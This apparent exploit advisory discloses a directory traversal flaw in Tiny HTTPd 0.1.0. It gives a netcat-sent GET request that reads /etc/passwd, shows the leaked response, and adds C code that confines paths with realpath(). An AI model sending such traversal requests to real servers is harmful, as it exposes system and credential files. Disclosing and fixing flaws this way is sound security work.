#======================================================================================
# Exploit Author: Touhid M.Shaikh
# Exploit Title: Tiny HTTPd 0.1.0 Local File Traversal
# Date: 26-09-2017
# Website: www.touhidshaikh.com
# Vulnerable Software: Tiny HTTPd
# Version: 0.1.0
# Download Link: https://sourceforge.net/projects/tinyhttpd/?source=directory
#======================================================================================

# To reproduce the exploit:
# 1. Run the server: # ./httpd
# 2. Connect with netcat: # nc localhost 44123
#    and send the request:
GET /../../../../../../../../../../../etc/passwd HTTP/1.1

#==========
# Response
#==========

HTTP/1.0 200 OK
Server: jdbhttpd/0.1.0
Content-Type: text/html

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
---------------------snip---------------------------
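
# Added example (not part of the original advisory and not Tiny HTTPd's own code): one way a
# server can refuse the request above is to canonicalize the joined path with realpath() and
# serve it only if the result stays under the document root. The function names and the
# temporary docroot holding index.html are assumptions constructed for the demo.

```c
/* Added example (not Tiny HTTPd source): confine request paths to the docroot. */
#define _XOPEN_SOURCE 700
#include <limits.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

/* Returns 0 and fills out with the canonical file path, or -1 if the path
 * does not exist or resolves outside docroot. */
int resolve_under_root(const char *docroot, const char *url_path, char *out, size_t outlen)
{
    char root[PATH_MAX], joined[PATH_MAX], real[PATH_MAX];

    if (url_path[0] != '/' || realpath(docroot, root) == NULL)
        return -1;
    int n = snprintf(joined, sizeof joined, "%s%s", root, url_path);
    if (n < 0 || (size_t)n >= sizeof joined)
        return -1;                          /* truncated path: refuse */
    if (realpath(joined, real) == NULL)     /* collapses "..", follows symlinks */
        return -1;
    size_t rlen = strlen(root);
    /* Prefix must end on a path boundary so /srv/www2 never matches /srv/www. */
    if (strncmp(real, root, rlen) != 0 ||
        (rlen > 1 && real[rlen] != '/' && real[rlen] != '\0') ||
        strlen(real) >= outlen)
        return -1;
    strcpy(out, real);
    return 0;
}

/* Constructed demo: temporary docroot holding index.html (hypothetical layout). */
int check_request(const char *url_path)
{
    char dir[] = "/tmp/docrootXXXXXX", file[PATH_MAX], out[PATH_MAX];
    if (mkdtemp(dir) == NULL) return -2;
    snprintf(file, sizeof file, "%s/index.html", dir);
    FILE *f = fopen(file, "w");
    if (f != NULL) fclose(f);
    int rc = resolve_under_root(dir, url_path, out, sizeof out);
    unlink(file);
    rmdir(dir);
    return rc;
}

int main(void)
{
    printf("%d %d\n", check_request("/index.html"),
           check_request("/../../../../../../../../../../../etc/passwd"));
    return 0;
}
```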